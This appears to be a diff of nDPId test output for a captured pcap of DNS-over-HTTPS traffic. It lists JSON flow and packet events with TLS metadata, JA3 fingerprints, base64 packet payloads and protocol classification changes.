{"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946739661537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739661537,"pkt":"REREREREZmZmZmZmCABFAAB4x6RAAK8GODIKAAABuetRAa6gAbuz5lpElG1MBVAYAfXMEwAAFAMDAAEBFwMDAEU4SkGRhTVOzjkja1xO2w+N\/vz+OkRmcdhLqaqpXQNb6A6SRcM4Xi9F7CyJ7zWjY541e0wZEZOfbwCMOI4VGHKGlHVB\/Ow="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739879619,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739879619,"pkt":"REREREREZmZmZmZmCABFAAFIcKVAAGQGIToKAAAB0frxGYueAbsFpAMoj2Q4kFAYAfaFCwAAFgMBARsBAAEXAwNRmx2nSkx+6m6KcnM1jGr2d9+E6hEUWeU+Rct80JF14yBFUW7fbN2m28L3JLX9K8uSgoBCeEP2oBBIn6aFnchRZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILzmWxHpwarRt4Ej829OBgtUnpC5uzX3e58yGu+riJtB"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 03223{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739879647,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAgoIhBAADcGle\/R+vEZCgAAAQG7i56PZDiQBaQESFAYAfWL6wAAFgMDAGYCAABiAwOvuIoBv9aLdY9+pRuVYLTvaIEBB5j8JJqoUP\/T+o4DJyAaq0H4FgIYS60khmCU6D9TGVas7XFToGUgExNzFU9aPcAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT
67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\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\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} 
-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
02465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946739879647,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAXxIhJAADcGmCTR+vEZCgAAAQG7i56PZECQBaQESFAYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/h
FMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIKQoxhH\/Z4NdCHDs7qK8wmGbCtHgbBpAtyYYPJoz0BNpCAQBAI2s5yjtMrI9QJNozqSEdCsumaSKt\/QNxoJ5PFMWs10MAWl+5CjGLSlpjhytuQkP602gJ28TSQHyyO39DQ2pHRZ1MjKiwLUGQnSrx7B1qsIRx8U65WEhaQ\/Oefjv8VGGg2Nnh0hcGrHjYUxlGavnUge+GnGDrvgzWTdBb6fu\/ASgdFWYo\/L\/cx\/DQSF7KqdfFLYtqS\/mVGjCi+aU3DGzfokfH8gTddjOpZA9DbKNE5R+fiOUj+uHJsETXL1+AHkZ1DyEVNTPTtlzClPqiVFZoiQLHaM5Rks\/r\/SATzjVrNW7MyikygwLvRY4rKK4uz5N88k\/vqkRvVB4EA04vef95bIWAwMABA4AAAA="} -01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} 
-00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
